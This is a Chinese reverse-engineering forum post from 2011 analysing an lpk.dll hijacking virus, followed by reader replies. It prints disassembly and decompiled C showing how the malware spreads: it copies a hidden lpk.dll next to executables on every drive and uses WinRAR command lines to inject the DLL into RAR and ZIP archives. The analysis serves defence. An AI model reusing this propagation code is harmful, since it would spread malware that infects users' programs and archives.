首页
社区
课程
招聘
[原创]lpk类病毒分析
发表于: 2011-2-6 20:23 31520

[原创]lpk类病毒分析

2011-2-6 20:23
31520

lpk类病毒分析
病毒体来源http://www.52pojie.cn/thread-75591-1-1.html

除夕那天晚上写了个Lpk、并对lpk做了点研究、所以想必今天晚上看起来这些应该会方便很多、至于关于
lpk的文章请去我Blog参考笔记、这里就不废话了
我的Lpk.cpp
http://hi.baidu.com/hackernewyangjt/blog/item/a4e15a8241ccaab10df4d200.html
直接载入Lpk11.dll

.text:10001A32 ; =============== S U B R O U T I N E =======================================
.text:10001A32
.text:10001A32
.text:10001A32 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID 
lpReserved)
.text:10001A32                 public DllEntryPoint
.text:10001A32 DllEntryPoint   proc near
.text:10001A32
.text:10001A32 hLibModule      = dword ptr  4
.text:10001A32 fdwReason       = dword ptr  8
.text:10001A32 lpReserved      = dword ptr  0Ch
.text:10001A32
.text:10001A32                 cmp     [esp+fdwReason], 1
.text:10001A37                 push    esi
.text:10001A38                 jnz     short loc_10001AA9
.text:10001A3A                 mov     esi, [esp+4+hLibModule]
.text:10001A3E                 push    104h            ; nSize
.text:10001A43                 push    offset ExistingFileName ; lpFilename
.text:10001A48                 push    esi             ; hModule
.text:10001A49                 mov     dword_10003290, esi
.text:10001A4F                 call    ds:GetModuleFileNameW
.text:10001A55                 push    esi             ; hLibModule
.text:10001A56                 call    ds:DisableThreadLibraryCalls
.text:10001A5C                 call    GetMutexName
.text:10001A61                 cmp     eax, 1
.text:10001A64                 jnz     short loc_10001AA2
.text:10001A66                 call    IsVirusKernelFile  ;用来判断是否由病毒核
心进程释放
.text:10001A6B                 test    eax, eax
.text:10001A6D                 jnz     short loc_10001A7D
.text:10001A6F                 call    CreateMutex
.text:10001A74                 test    eax, eax
.text:10001A76                 jnz     short loc_10001A7D
.text:10001A78                 call    ExpandVirusKernel
.text:10001A7D
.text:10001A7D loc_10001A7D:                           ; CODE XREF: DllEntryPoint+3Bj
.text:10001A7D                                         ; DllEntryPoint+44j
.text:10001A7D                 call    IsCurrentFileLpk
.text:10001A82                 cmp     eax, 1
.text:10001A85                 jnz     short loc_10001AA2
.text:10001A87                 push    0               ; lpName
.text:10001A89                 push    0               ; bInitialState
.text:10001A8B                 push    eax             ; bManualReset
.text:10001A8C                 push    0               ; lpEventAttributes
.text:10001A8E                 call    ds:CreateEventW
.text:10001A94                 mov     hHandle, eax
.text:10001A99                 test    eax, eax
.text:10001A9B                 jz      short loc_10001AA2
.text:10001A9D                 call    StartInfectThraed
.text:10001AA2
.text:10001AA2 loc_10001AA2:                           ; CODE XREF: DllEntryPoint+32j
.text:10001AA2                                         ; DllEntryPoint+53j ...
.text:10001AA2                 call    InitLpk
.text:10001AA7                 jmp     short loc_10001AEC
.text:10001AA9 ; ---------------------------------------------------------------------------

009119E6 <lpk11.StartThread>  /$  56            push    esi
009119E7                      |.  33F6          xor     esi, esi
009119E9                      |.  56            push    esi                              ; 
/pThreadId => NULL
009119EA                      |.  6A 04         push    4                                ; |
CreationFlags = CREATE_SUSPENDED
009119EC                      |.  56            push    esi                              ; |
pThreadParm => NULL
009119ED                      |.  68 D3189100   push    <FuckAllDisk>                    ; |
ThreadFunction = <lpk11.FuckAllDisk>
009119F2                      |.  56            push    esi                              ; |
StackSize => 0
009119F3                      |.  56            push    esi                              ; |
pSecurity => NULL
009119F4                      |.  FF15 A0209100 call    dword ptr [<&KERNEL32.CreateThre>; 
\CreateThread
009118D3 <lpk11.FuckAllDisk>   .  81EC C4000000 sub     esp, 0C4
009118D9                       .  53            push    ebx
009118DA                       .  55            push    ebp
009118DB                       .  56            push    esi
009118DC                       .  57            push    edi
009118DD                       .  6A 60         push    60                               ; 
/Length = 60 (96.)
009118DF                       .  8D4424 78     lea     eax, dword ptr [esp+78]          ; |
009118E3                       .  50            push    eax                              ; |
Destination
009118E4                       .  33FF          xor     edi, edi                         ; |
009118E6                       .  FF15 34209100 call    dword ptr [<&KERNEL32.RtlZeroMem>; 
\RtlZeroMemory
009118EC                       >  6A 02         push    2
009118EE                       .  5B            pop     ebx
009118EF                       .  8D6C24 74     lea     ebp, dword ptr [esp+74]
009118F3                       .  C74424 10 180>mov     dword ptr [esp+10], 18
009118FB                       >  837D 00 01    cmp     dword ptr [ebp], 1
009118FF                       .  74 5B         je      short 0091195C
00911901                       .  53            push    ebx
00911902                       .  FF15 B4209100 call    dword ptr [<&SHELL32.#64>]       ;  
shell32.DriveType
00911908                       .  83C0 FE       add     eax, -2
0091190B                       .  83F8 02       cmp     eax, 2                           ;  类
型否为可感染类型?
0091190E                       .  77 4C         ja      short 0091195C
00911910                       .  33C0          xor     eax, eax
00911912                       .  50            push    eax                              ; 
/pThreadId => NULL
00911913                       .  6A 04         push    4                                ; |
CreationFlags = CREATE_SUSPENDED
00911915                       .  53            push    ebx                              ; |
pThreadParm
00911916                       .  68 77169100   push    <Infect>                         ; |
ThreadFunction = <lpk11.Infect>
0091191B                       .  50            push    eax                              ; |
StackSize => 0
0091191C                       .  50            push    eax                              ; |
pSecurity => NULL
0091191D                       .  FF15 A0209100 call    dword ptr [<&KERNEL32.CreateThre>; 
\CreateThread
signed int __stdcall Infect(LPCWSTR lpString1)
{
  const WCHAR *v2; // [url=mailto:eax@17]eax@17[/url]
  struct _WIN32_FIND_DATAW FindFileData; // [sp+4h] [bp-668h]@6
  WCHAR String2; // [sp+254h] [bp-418h]@4
  WCHAR FileName; // [sp+45Ch] [bp-210h]@6
  HANDLE hFindFile; // [sp+664h] [bp-8h]@6
  int v7; // [sp+668h] [bp-4h]@1
  const WCHAR *v8; // [sp+674h] [bp+8h]@17
  v7 = 1;
  if ( WaitForSingleObject(hHandle, 0) != 258 )
    return 0;
  if ( (unsigned int)lpString1 >= 0x100 )
  {
    lstrcpyW(&String2, lpString1);
  }
  else
  {
    lstrcpyW(&String2, L"A:\\");
    String2 += (unsigned __int16)lpString1;
  }
  lstrcpyW(&FileName, &String2);
  PathAppendW(&String2, &word_10002374);
  hFindFile = FindFirstFileW(&String2, &FindFileData);
  if ( hFindFile == (HANDLE)-1 )
    return 1;
  lstrcpyW(&String2, &FileName);
  while ( 1 )
  {
    if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..") 
)
      goto LABEL_27;
    if ( FindFileData.dwFileAttributes & 0x10 )
      break;
    v2 = PathFindExtensionW(FindFileData.cFileName);
    v8 = v2;
    if ( v2 )
    {
      if ( !lstrcmpiW(v2, L".EXE") )            // 目录下有exe就将lpk复制过去
      {
        lstrcpyW(&FileName, &String2);
        PathAppendW(&FileName, L"lpk.dll");
        if ( GetFileAttributesW(&FileName) != -1 )
          goto LABEL_27;
        CopyFileW(&ExistingFileName, &FileName, 1);
        SetFileAttributesW(&FileName, 7u);
      }
      if ( !lstrcmpiW(v8, L".RAR") || !lstrcmpiW(v8, L".ZIP") )// 压缩包感染过程
      {
        if ( !FindFileData.nFileSizeHigh )
        {
          if ( FindFileData.nFileSizeLow < 0x3200000 )
          {
            lstrcpyW(&FileName, &String2);
            PathAppendW(&FileName, FindFileData.cFileName);
            InfectCompressFile(&FileName);
          }
        }
      }
    }
DWORD __cdecl InfectCompressFile(int a1)
{
  DWORD result; // [url=mailto:eax@1]eax@1[/url]
  wchar_t v2[2]; // [url=mailto:eax@3]eax@3[/url]
  UINT v3; // [url=mailto:eax@6]eax@6[/url]
  WCHAR CommandLine; // [sp+0h] [bp-824h]@6
  WCHAR PathName; // [sp+410h] [bp-414h]@6
  WCHAR FileName; // [sp+618h] [bp-20Ch]@1
  const WCHAR String2; // [sp+61Ah] [bp-20Ah]@3
  int v8; // [sp+820h] [bp-4h]@1
  v8 = 520;
  result = SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0, 
&FileName, &v8);
  if ( !result )
  {
    if ( FileName == 34 )
    {
      lstrcpyW(&FileName, &String2);
      *(_DWORD *)v2 = L"\"";
    }
    else
    {
      *(_DWORD *)v2 = L" ";
    }
    result = StrStrIW(&FileName, *(_DWORD *)v2);
    if ( result )
    {
      *(_WORD *)result = 0;
      PathRemoveFileSpecW(&FileName);
      PathAppendW(&FileName, L"rar.exe");
      result = GetFileAttributesW(&FileName);
      if ( result != -1 )
      {
        PathGetShortPath(&FileName);
        GetTempPathW(MAX_PATH, &PathName);
        v3 = GetCurrentThreadId();
        GetTempFileNameW(&PathName, L"IRAR", v3, &PathName);
        ((void (__cdecl *)(WCHAR *, _DWORD, WCHAR *, int, WCHAR *))wsprintfW)(
          &CommandLine,
          L"cmd /c %s vb \"%s\" lpk.dll|find /i \"lpk.dll\"",
          &FileName,
          a1,
          &PathName);
        result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        if ( result )
        {
          wsprintfW(&CommandLine, L"\"%s\" x \"%s\" *.exe \"%s\\\"", &FileName, a1, 
&PathName);
          UpdatePackage(&CommandLine, 0x1D4C0u);
          Infect(&PathName);
          wsprintfW(&CommandLine, L"\"%s\" a -r -ep1\"%s\" \"%s\" \"%s\\lpk.dll\"", &FileName, 
&PathName, a1, &PathName);
          UpdatePackage(&CommandLine, 0x3A980u);
          wsprintfW(&CommandLine, L"cmd /c RD /s /q \"%s\"", &PathName);
          result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        }
      }
    }
  }
  return result;
}
FF 05 00 00 AF 00 A1 00 00 AF 00 6B C0 12 8D 80 3C 36 40 00 FF E0 FF 25 70 62 40 00 51 52 68 E0 8D 40 00 E9 00 00 00 00 68 78 69 40 00 E8 EE 02 00 00 5A 59 EB CA

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

上传的附件:
收藏
免费 7
支持
分享
最新回复 (7)
雪    币: 4
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
前排。。。      。
2011-2-6 21:41
0
雪    币: 414
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
不错呀~
2011-2-6 22:11
0
雪    币: 134
活跃值: (84)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
4
最近我也在关注这个病毒,加上你这个样本我已经收集3个不同的版本了,通过分析,这应该是个有具体团队或者个人持续更新的国产傀儡网络木马病毒,主要功能是对指定目标进行DDOS攻击,当然也有远程下载并运行的功能。3个版本拥有同样的dropper和字串加密解密算法(但key值有变化),程序稍有更新,最原始的版本甚至完全没有加壳。顺便在你的查杀方法上补充一下,这个病毒会在%system32%里生成hra??.dll(??代表2个随机数字)。有兴趣可以跟我继续交流。

ps:头像变漂亮了啊,呵呵
2012-3-30 03:10
0
雪    币: 114
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
请查看一下你的临时文件夹 好像里面也有的。。。。。
2012-3-30 10:15
0
雪    币: 822
活跃值: (380)
能力值: ( LV12,RANK:310 )
在线值:
发帖
回帖
粉丝
6
顶一下CG图,看画风是樋上いたる 吧,是LittleBuster里的吗,怎么没印象
2012-3-30 10:21
0
雪    币: 473
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
来围观一下吧..
2012-9-6 16:33
0
雪    币: 148
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
lpk风靡了一阵子
现在风光不再了~
2013-4-3 00:19
0
游客
登录 | 注册 方可回帖
返回
//